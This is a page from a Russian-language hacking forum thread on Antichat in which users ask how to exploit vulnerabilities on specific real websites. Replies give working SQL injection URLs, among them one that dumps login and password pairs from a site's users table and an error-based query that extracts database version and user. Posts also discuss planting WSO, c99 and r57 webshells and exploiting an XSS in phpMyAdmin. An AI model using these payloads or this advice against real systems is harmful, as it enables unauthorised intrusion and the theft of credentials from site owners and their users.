Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
Page 1053 of 1207
  1. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Возможно там Perl и нет, если .htaccess действителен, то вам нужно указать путь какой либо исполняемого файла, к примеру /usr/bin/python, так-же может иметься возможность написать приложение на C++.
     
    #21041 randman, 3 Sep 2012
  2. DeepXhadow

    DeepXhadow Elder - Старейшина

    Joined:
    19 Apr 2008
    Messages:
    57
    Likes Received:
    11
    Reputations:
    5
    Приветствую! Есть слепая скуля на MS SQL Server'е... можно ли как-нить читать файлики на сервере, юзая блинд? права SYSTEM
     
    #21042 DeepXhadow, 3 Sep 2012
  3. foma9999

    foma9999 New Member

    Joined:
    5 Jan 2010
    Messages:
    83
    Likes Received:
    2
    Reputations:
    -5
    Ошибки следующего вида при подставлении ' в строку
    http://i.imgur.com/ZErAT.png

    Но когда перебираю +UNION+SELECT+1,2,..+--+
    Ничего не исчезает!
    До 30ти перебирал.
    Как раскрутить эту sql?
     
    #21043 foma9999, 3 Sep 2012
  4. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    пантамимой не занимаемся, скиньте URL или не задавайте подобные вопросы на которые просто не возможно ответить
     
    _________________________
    #21044 Konqi, 3 Sep 2012
  5. Skofield

    Skofield Elder - Старейшина

    Joined:
    27 Aug 2008
    Messages:
    960
    Likes Received:
    392
    Reputations:
    58
    foma9999,
    Code:
    http://www.advis.ru/gotovye-issledovaniya/page.php?ID=-20839'+union+select+1,group_concat(login,0x3a,password),3,4,5,6,7,8,9,0,11,concat_ws(0x3a,version(),user(),database()),13,14,15,16,17,18,19,20,21,22+from+users--+
     
    #21045 Skofield, 3 Sep 2012
  6. RColor

    RColor New Member

    Joined:
    17 Aug 2012
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Спасибо тебе за дружеский совет :),
    но я интересуюсь не для нажива ради, а только с целью научиться что делать в подобных ситуациях, в данном случае Артек подвернулся под руку...
     
    #21046 RColor, 4 Sep 2012
  7. dynda2000

    dynda2000 New Member

    Joined:
    16 Mar 2012
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    phpmyadmin 3.3.8

    Зашел на /pma/setup/index.php создал сервер с именем <script>alert("like this")</script>
    [​IMG]
    Подскажите плиз как можно это использовать?
     
    #21047 dynda2000, 5 Sep 2012
  8. blesse

    blesse Member

    Joined:
    18 Jan 2012
    Messages:
    175
    Likes Received:
    8
    Reputations:
    1
    залил на серв wso и на тебе:
    Warning: gzinflate() has been disabled for security reasons in путь : regexp code on line 1
    первый раз с таким сталкиваюсь , я так понял эта функция отключена(гуглил ,но не понял насколько эта функция критична для вебшелла) какой тогда шелл попробывать?
     
    #21048 blesse, 5 Sep 2012
  9. kroŧ

    kroŧ Member

    Joined:
    19 May 2010
    Messages:
    129
    Likes Received:
    33
    Reputations:
    8
    blesse любой где не используется эта функция, wso не пакованный, c99, c100, r57, Safe0ver и тд..
     
    #21049 kroŧ, 5 Sep 2012
  10. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    393
    Likes Received:
    40
    Reputations:
    23
    это не скуля
     
    #21050 er9j6@, 7 Sep 2012
  11. DeepXhadow

    DeepXhadow Elder - Старейшина

    Joined:
    19 Apr 2008
    Messages:
    57
    Likes Received:
    11
    Reputations:
    5
    это xpath inj, можно выдергивать данные из XML файлов... достаточно бесполезная уязвимость, т к вся более-менее "нужная" инфа хранится все-таки в бд....
     
    #21051 DeepXhadow, 9 Sep 2012
    Last edited: 10 Sep 2012
  12. mironich

    mironich Elder - Старейшина

    Joined:
    27 Feb 2011
    Messages:
    733
    Likes Received:
    73
    Reputations:
    19
    Кавычка не закрыта, где-то там.
    Хотя, это смахивает на code-inj раз он интерпретирует кавычку.
     
    #21052 mironich, 9 Sep 2012
  13. WendM

    WendM Member

    Joined:
    29 Jan 2012
    Messages:
    44
    Likes Received:
    7
    Reputations:
    3
    Не могу раскрутить. Сервер выдает:
    Code:
    Array ( [0] => Array ( [message] => MySQL Query Error ) [1] => Array ( [sql] => SELECT article_id, title, author, add_time, file_url, open_type, content FROM `d2okcom_gh0P72s`.`d2ok_article` WHERE is_open = 1 AND cat_id IN ('14') ORDER BY article_type DESC, add_time DESC LIMIT -10, 10 ) [2] => Array ( [error] => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-10, 10' at line 1 ) [3] => Array ( [errno] => 1064 ) )
    С помощью union select не смог.
    Скуля вида site.com/bla.php?id=[SQLI]17
    А так ошибку не выдает site.com/bla.php?id=17[SQLI]
     
    #21053 WendM, 10 Sep 2012
  14. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Подозреваю, что тут инъекция в limit.

    Тыц

    Попробуй id=17,10+union.....+--+
     
    _________________________
    #21054 BigBear, 10 Sep 2012
  15. DeepXhadow

    DeepXhadow Elder - Старейшина

    Joined:
    19 Apr 2008
    Messages:
    57
    Likes Received:
    11
    Reputations:
    5
    только раскрытие путей?
     
    #21055 DeepXhadow, 10 Sep 2012
  16. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Скорее всего - да.
     
    _________________________
    #21056 BigBear, 10 Sep 2012
  17. persmash

    persmash New Member

    Joined:
    26 Apr 2010
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Привет там,
    Есть кто-нибудь, кто знает, как использовать этот подвиг?
    http://3dwebdesign.org/forum/index.php?showtopic=1113
     
    #21057 persmash, 10 Sep 2012
  18. Always

    Always New Member

    Joined:
    8 Feb 2012
    Messages:
    72
    Likes Received:
    3
    Reputations:
    0
    http://cancer.eur[google]olab.ua/blogs/view/post/368'

    Никак не могу раскрутить...ваше мнение ?
     
    #21058 Always, 10 Sep 2012
  19. Skofield

    Skofield Elder - Старейшина

    Joined:
    27 Aug 2008
    Messages:
    960
    Likes Received:
    392
    Reputations:
    58
    Always
    Code:
    http://cancer.eurolab.ua/blogs/view/post/368+and(select+1+from(select+count(*),concat((select+substr(concat_ws(0x3a,version(),user(),database()),1,100)),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+
     
    #21059 Skofield, 10 Sep 2012
    1 person likes this.
  20. Always

    Always New Member

    Joined:
    8 Feb 2012
    Messages:
    72
    Likes Received:
    3
    Reputations:
    0
    http://www.mamashkam.ru/users/tennisvip/blog/1'and(select*from(select(name_const(version(),1)),name_const(version(),1))a)and(1)='1 --.html

    Версию вывел, но больше ничего...
    По возможности подскажите.
     
    #21060 Always, 11 Sep 2012
(You must log in or sign up to post here.)
Page 1053 of 1207
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.